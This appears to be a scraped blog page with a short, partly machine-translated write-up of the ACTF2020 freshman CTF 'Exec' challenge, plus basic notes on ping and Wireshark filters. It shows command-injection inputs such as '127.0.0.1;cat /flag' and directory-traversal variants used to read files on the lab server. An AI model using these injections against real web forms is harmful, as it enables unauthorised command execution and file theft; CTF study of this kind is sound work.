当前位置:网站首页>[ACTF2020 Freshman Competition]Exec 1
[ACTF2020 Freshman Competition]Exec 1
2022-07-29 21:25:00 【Borrow zj article [de]BvxiE】
ping命令
如何在cmd里面ping命令
指令:racert 网址
pinga website and ping -t A URL comes out of the difference,The former is only displayed4组数据.
ipconfig /allDisplay your computer configuration
WiresharkA little bit of use,查找时(过滤)
ping时:ip.addr ==网址 and icmp
directly on the web page:
http and ip.addr == 网址
ip.addr ==网址 and tcp
27个常用的 Linux 命令!ls会列举出当前工作目录的内容(文件或文件夹)
[ACTF2020 新生赛]Exec 1
养成习惯!Just grab a bag!This question does not use tools,whole principle!
127.0.0.1;ls

127.0.0.1;ls /,列出根目录下的文件
127.0.0.1;cat /flag,cat进行读取
or available from below127.0.0.1;cat ../../../flag
是看wp的,Sort out the knowledge points
1.127.0.0.1;cat index.php,Find the information inside


isset ()A function is used to determine if a variable is set and not null;换句话说,only if the variable is notnull时才返回true.
2.目录遍历
简单了解一下目录遍历!127.0.0.1;ls ../
127.0.0.1;ls ../../
127.0.0.1;ls ../../../和127.0.0.1;ls ../../../../效果一样,So in general as long as there are enough sets!
命令注入
Just to find out this time命令注入符号!
Excerpt from the previous link!
可参考文章:https://blog.csdn.net/m0_47745762/article/details/118932465?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165848802716782248535320%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=165848802716782248535320&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-118932465-null-null.142v33experiment_2_v1,185v2control&utm_term=actf2020%20%E6%96%B0%E7%94%9F%E8%B5%9B%5Dexec%2019&spm=1018.2226.3001.4187
及文章:https://blog.csdn.net/wangyuxiang946/article/details/120995294?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165848802716782248535320%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=165848802716782248535320&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-2-120995294-null-null.142v33experiment_2_v1,185v2control&utm_term=actf2020%20%E6%96%B0%E7%94%9F%E8%B5%9B%5Dexec%2019&spm=1018.2226.3001.4187
边栏推荐
- Is it safe to use the MD5 encrypted string to store the password?Hash algorithm you have to know
- 进程间六种通信方式
- JSP Servlet JDBC MySQL CRUD Sample Tutorial
- Data visualization ---- web page displays temperature and humidity
- Baidu internship students late night fun: originally giant is this kind of life
- RNA修饰技术介绍|介孔二氧化硅纳米颗粒(MSN)搭载的微小RNA-24(miR-24)纳米载体复合物
- WPF 实现抽屉菜单
- 尿素偶联Urea-siRNA Conjugates|Cyclodextrin-siRNA-β-CD环糊精修饰RNA核酸(解析说明)
- SAP ABAP OData 服务 Data Provider Class 的 GET_ENTITYSET 方法实现指南试读版
- 如何让 x == 1 && x == 2 && x == 3 等式成立
猜你喜欢

Kubernetes: (4) Common commands

VR直播营销需求增加,数据模块为我们铺路
![[ACTF2020 新生赛]Exec 1](/img/1e/a3c19d514207e6965d09c66b86e519.png)
[ACTF2020 新生赛]Exec 1

Safe Browser will have these hidden features that will let you play around with your browser

分析少年派2中的Crypto

核壳二氧化钛纳米颗粒修饰DNA|二氢杨梅素修饰DNA药物|相关介绍

A dish hold up valuations billions of mt. Pickled fish, can move beyond the edge food safety?

SAG1-MIC8复合DNA基因疫苗|新型脂质-HAP-DNA复合体|实验要求

Is it safe to use the MD5 encrypted string to store the password?Hash algorithm you have to know

全景教程丨VR全景拍摄如何拍摄日出和日落的场景?
随机推荐
图床软件要收费,算了我自己写一个开源免费的。
uri与url的区别简单理解(uri和url有什么区别)
Baidu internship students late night fun: originally giant is this kind of life
断言+异常处理类,代码更简洁了
七个易犯的 IT 管理错误—以及如何避免
太卷了,企业级的智慧物业系统,也完全开源....
百度实习学弟深夜吐槽:原来大厂是这种生活啊
include用法及搭配(include相关短语)
Is it safe to use the MD5 encrypted string to store the password?Hash algorithm you have to know
:class数组写法
诺氟沙星-DNA复合物|半乳糖化脂质体-聚阳离子-DNA复合物|注意事项
叶酸&适配体修饰DNA纳米载体|CdS纳米颗粒修饰DNA|科研试剂
单壁碳纳米管-DNA复合物(SWCNT-DNA)|作用机理
赶紧进来!!!带你认识C语言基本数据类型
LeetCode 0593. 有效的正方形
解析掌握现代化少儿编程实操能力
WPF 实现抽屉菜单
json-c实现json和结构体之间的相互转换
R language for airbnb data nlp text mining, geography, word cloud visualization, regression GAM model, cross-validation analysis
促进二十一世纪创客教育的新发展